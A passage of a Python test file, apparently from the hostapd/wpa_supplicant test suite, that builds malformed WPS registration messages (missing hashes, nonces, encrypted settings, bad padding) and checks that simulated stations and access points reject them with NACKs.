dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_no_msg_type(dev, apdev):
"""WPS and ACK M3 no Message Type"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_ack(eap_id, e_nonce, r_nonce, msg_type=None)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_invalid_msg_type(dev, apdev):
"""WPS and ACK M3 invalid Message Type"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_ack(eap_id, e_nonce, r_nonce, msg_type=123)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_invalid_attr(dev, apdev):
"""WPS and ACK M3 invalid attribute"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send ACK to STA")
attrs = b'\x10\x10\x00'
msg = build_eap_wsc(1, eap_id, attrs, opcode=WSC_ACK)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3(dev, apdev):
"""WPS and ACK M3"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send ACK to STA")
msg, attrs = build_ack(eap_id, e_nonce, r_nonce)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def wps_to_m3_helper(dev, apdev):
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
return eap_id, m1_attrs, r_nonce, bssid, r_hash1, r_hash2, r_s1, r_s2, raw_m3_attrs, authkey, keywrapkey
def wps_to_m3(dev, apdev):
eap_id, m1_attrs, r_nonce, bssid, r_hash1, r_hash2, r_s1, r_s2, raw_m3_attrs, authkey, keywrapkey = wps_to_m3_helper(dev, apdev)
return eap_id, m1_attrs[ATTR_ENROLLEE_NONCE], r_nonce, bssid, r_hash1, r_hash2, r_s1, raw_m3_attrs, authkey, keywrapkey
def wps_to_m5(dev, apdev):
eap_id, m1_attrs, r_nonce, bssid, r_hash1, r_hash2, r_s1, r_s2, raw_m3_attrs, authkey, keywrapkey = wps_to_m3_helper(dev, apdev)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m3_attrs, attrs)
raw_m4_attrs = attrs
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 from STA")
msg, m5_attrs, raw_m5_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M5)
return eap_id, m1_attrs[ATTR_ENROLLEE_NONCE], r_nonce, bssid, r_hash1, r_hash2, r_s2, raw_m5_attrs, authkey, keywrapkey
def test_wps_ext_proto_m4_missing_r_hash1(dev, apdev):
"""WPS and no R-Hash1 in M4"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s1, m3, authkey, keywrapkey = wps_to_m3(dev, apdev)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
#attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, m3, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m4_missing_r_hash2(dev, apdev):
"""WPS and no R-Hash2 in M4"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s1, m3, authkey, keywrapkey = wps_to_m3(dev, apdev)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
#attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, m3, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m4_missing_r_snonce1(dev, apdev):
"""WPS and no R-SNonce1 in M4"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s1, m3, authkey, keywrapkey = wps_to_m3(dev, apdev)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
#data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
data = b''
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, m3, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m4_invalid_pad_string(dev, apdev):
"""WPS and invalid pad string in M4"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s1, m3, authkey, keywrapkey = wps_to_m3(dev, apdev)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
m = hmac.new(authkey, data, hashlib.sha256)
kwa = m.digest()[0:8]
data += build_wsc_attr(ATTR_KEY_WRAP_AUTH, kwa)
iv = 16*b'\x99'
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
pad_len = 16 - len(data) % 16
ps = (pad_len - 1) * struct.pack('B', pad_len) + struct.pack('B', pad_len - 1)
data += ps
wrapped = aes.encrypt(data)
attrs += build_wsc_attr(ATTR_ENCR_SETTINGS, iv + wrapped)
attrs += build_attr_authenticator(authkey, m3, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m4_invalid_pad_value(dev, apdev):
"""WPS and invalid pad value in M4"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s1, m3, authkey, keywrapkey = wps_to_m3(dev, apdev)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
m = hmac.new(authkey, data, hashlib.sha256)
kwa = m.digest()[0:8]
data += build_wsc_attr(ATTR_KEY_WRAP_AUTH, kwa)
iv = 16*b'\x99'
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
pad_len = 16 - len(data) % 16
ps = (pad_len - 1) * struct.pack('B', pad_len) + struct.pack('B', 255)
data += ps
wrapped = aes.encrypt(data)
attrs += build_wsc_attr(ATTR_ENCR_SETTINGS, iv + wrapped)
attrs += build_attr_authenticator(authkey, m3, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m4_no_encr_settings(dev, apdev):
"""WPS and no Encr Settings in M4"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s1, m3, authkey, keywrapkey = wps_to_m3(dev, apdev)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
attrs += build_attr_authenticator(authkey, m3, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m6_missing_r_snonce2(dev, apdev):
"""WPS and no R-SNonce2 in M6"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s2, m5, authkey, keywrapkey = wps_to_m5(dev, apdev)
logger.debug("Send M6 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M6)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
#data = build_wsc_attr(ATTR_R_SNONCE2, r_s2)
data = b''
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, m5, attrs)
m6 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m6)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M7 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m6_no_encr_settings(dev, apdev):
"""WPS and no Encr Settings in M6"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s2, m5, authkey, keywrapkey = wps_to_m5(dev, apdev)
logger.debug("Send M6 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M6)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
data = build_wsc_attr(ATTR_R_SNONCE2, r_s2)
#attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, m5, attrs)
m6 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m6)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M7 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m8_no_encr_settings(dev, apdev):
"""WPS and no Encr Settings in M6"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s2, m5, authkey, keywrapkey = wps_to_m5(dev, apdev)
logger.debug("Send M6 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M6)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
data = build_wsc_attr(ATTR_R_SNONCE2, r_s2)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, m5, attrs)
raw_m6_attrs = attrs
m6 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m6)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M7 from STA")
msg, m7_attrs, raw_m7_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M7)
logger.debug("Send M8 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M8)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
#attrs += build_attr_encr_settings(authkey, keywrapkey, m8_cred)
attrs += build_attr_authenticator(authkey, raw_m7_attrs, attrs)
raw_m8_attrs = attrs
m8 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m8)
logger.debug("Receive WSC_Done (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def wps_start_ext_reg(apdev, dev):
addr = dev.own_addr()
bssid = apdev['bssid']
ssid = "test-wps-conf"
appin = "12345670"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin }
hapd = hostapd.add_ap(apdev, params)
dev.scan_for_bss(bssid, freq="2412")
hapd.request("SET ext_eapol_frame_io 1")
dev.request("SET ext_eapol_frame_io 1")
dev.request("WPS_REG " + bssid + " " + appin)
return addr,bssid,hapd
def wps_run_ap_settings_proto(dev, apdev, ap_settings, success):
addr,bssid,hapd = wps_start_ext_reg(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive M1 from AP")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M1)
mac_addr = m1_attrs[ATTR_MAC_ADDR]
e_nonce = m1_attrs[ATTR_ENROLLEE_NONCE]
e_pk = m1_attrs[ATTR_PUBLIC_KEY]
appin = '12345670'
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, r_pk = wsc_dh_init()
authkey,keywrapkey = wsc_dh_kdf(e_pk, own_private, mac_addr, e_nonce,
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, appin, e_pk, r_pk)
logger.debug("Send M2 to AP")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, msg['eap_identifier'],
e_nonce, r_nonce, uuid_r, r_pk, eap_code=2)
send_wsc_msg(hapd, addr, m2)
logger.debug("Receive M3 from AP")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M3)
logger.debug("Send M4 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m3_attrs, attrs)
raw_m4_attrs = attrs
m4 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m4)
logger.debug("Receive M5 from AP")
msg, m5_attrs, raw_m5_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M5)
logger.debug("Send M6 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M6)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
data = build_wsc_attr(ATTR_R_SNONCE2, r_s2)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m5_attrs, attrs)
raw_m6_attrs = attrs
m6 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m6)
logger.debug("Receive M7 from AP")
msg, m7_attrs, raw_m7_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M7)
logger.debug("Send M8 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M8)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
if ap_settings:
attrs += build_attr_encr_settings(authkey, keywrapkey, ap_settings)
attrs += build_attr_authenticator(authkey, raw_m7_attrs, attrs)
raw_m8_attrs = attrs
m8 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m8)
if success:
ev = hapd.wait_event(["WPS-NEW-AP-SETTINGS"], timeout=5)
if ev is None:
raise Exception("New AP settings not reported")
logger.debug("Receive WSC_Done from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Done:
raise Exception("Unexpected message - expected WSC_Done")
logger.debug("Send WSC_ACK to AP")
ack,attrs = build_ack(msg['eap_identifier'], e_nonce, r_nonce,
eap_code=2)
send_wsc_msg(hapd, addr, ack)
dev[0].wait_disconnected()
else:
ev = hapd.wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("WPS failure not reported")
logger.debug("Receive WSC_NACK from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_NACK")
logger.debug("Send WSC_NACK to AP")
nack,attrs = build_nack(msg['eap_identifier'], e_nonce, r_nonce,
eap_code=2)
send_wsc_msg(hapd, addr, nack)
dev[0].wait_disconnected()
def test_wps_ext_ap_settings_success(dev, apdev):
"""WPS and AP Settings: success"""
ap_settings = build_wsc_attr(ATTR_NETWORK_INDEX, '\x01')
ap_settings += build_wsc_attr(ATTR_SSID, "test")
ap_settings += build_wsc_attr(ATTR_AUTH_TYPE, '\x00\x01')
ap_settings += build_wsc_attr(ATTR_ENCR_TYPE, '\x00\x01')
ap_settings += build_wsc_attr(ATTR_NETWORK_KEY, '')
ap_settings += build_wsc_attr(ATTR_MAC_ADDR, binascii.unhexlify(apdev[0]['bssid'].replace(':', '')))
wps_run_ap_settings_proto(dev, apdev, ap_settings, True)
@remote_compatible
def test_wps_ext_ap_settings_missing(dev, apdev):
"""WPS and AP Settings: missing"""
wps_run_ap_settings_proto(dev, apdev, None, False)
@remote_compatible
def test_wps_ext_ap_settings_mac_addr_mismatch(dev, apdev):
"""WPS and AP Settings: MAC Address mismatch"""
ap_settings = build_wsc_attr(ATTR_NETWORK_INDEX, '\x01')
ap_settings += build_wsc_attr(ATTR_SSID, "test")
ap_settings += build_wsc_attr(ATTR_AUTH_TYPE, '\x00\x01')
ap_settings += build_wsc_attr(ATTR_ENCR_TYPE, '\x00\x01')
ap_settings += build_wsc_attr(ATTR_NETWORK_KEY, '')
ap_settings += build_wsc_attr(ATTR_MAC_ADDR, '\x00\x00\x00\x00\x00\x00')
wps_run_ap_settings_proto(dev, apdev, ap_settings, True)
@remote_compatible
def test_wps_ext_ap_settings_mac_addr_missing(dev, apdev):
"""WPS and AP Settings: missing MAC Address"""
ap_settings = build_wsc_attr(ATTR_NETWORK_INDEX, '\x01')
ap_settings += build_wsc_attr(ATTR_SSID, "test")
ap_settings += build_wsc_attr(ATTR_AUTH_TYPE, '\x00\x01')
ap_settings += build_wsc_attr(ATTR_ENCR_TYPE, '\x00\x01')
ap_settings += build_wsc_attr(ATTR_NETWORK_KEY, '')
wps_run_ap_settings_proto(dev, apdev, ap_settings, False)
@remote_compatible
def test_wps_ext_ap_settings_reject_encr_type(dev, apdev):
"""WPS and AP Settings: reject Encr Type"""
ap_settings = build_wsc_attr(ATTR_NETWORK_INDEX, '\x01')
ap_settings += build_wsc_attr(ATTR_SSID, "test")
ap_settings += build_wsc_attr(ATTR_AUTH_TYPE, '\x00\x01')
ap_settings += build_wsc_attr(ATTR_ENCR_TYPE, '\x00\x00')
ap_settings += build_wsc_attr(ATTR_NETWORK_KEY, '')
ap_settings += build_wsc_attr(ATTR_MAC_ADDR, binascii.unhexlify(apdev[0]['bssid'].replace(':', '')))
wps_run_ap_settings_proto(dev, apdev, ap_settings, False)
@remote_compatible
def test_wps_ext_ap_settings_m2d(dev, apdev):
"""WPS and AP Settings: M2D"""
addr,bssid,hapd = wps_start_ext_reg(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive M1 from AP")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M1)
e_nonce = m1_attrs[ATTR_ENROLLEE_NONCE]
r_nonce = 16*'\x44'
uuid_r = 16*'\x33'
logger.debug("Send M2D to AP")
m2d, raw_m2d_attrs = build_m2d(raw_m1_attrs, msg['eap_identifier'],
e_nonce, r_nonce, uuid_r,
dev_pw_id='\x00\x00', eap_code=2)
send_wsc_msg(hapd, addr, m2d)
ev = hapd.wait_event(["WPS-M2D"], timeout=5)
if ev is None:
raise Exception("M2D not reported")
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
def wps_wait_ap_nack(hapd, dev, e_nonce, r_nonce):
logger.debug("Receive WSC_NACK from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_NACK")
logger.debug("Send WSC_NACK to AP")
nack,attrs = build_nack(msg['eap_identifier'], e_nonce, r_nonce,
eap_code=2)
send_wsc_msg(hapd, dev.own_addr(), nack)
dev.wait_disconnected()
@remote_compatible
def test_wps_ext_m3_missing_e_hash1(dev, apdev):
"""WPS proto: M3 missing E-Hash1"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
#attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m3_missing_e_hash2(dev, apdev):
"""WPS proto: M3 missing E-Hash2"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
#attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m5_missing_e_snonce1(dev, apdev):
"""WPS proto: M5 missing E-SNonce1"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
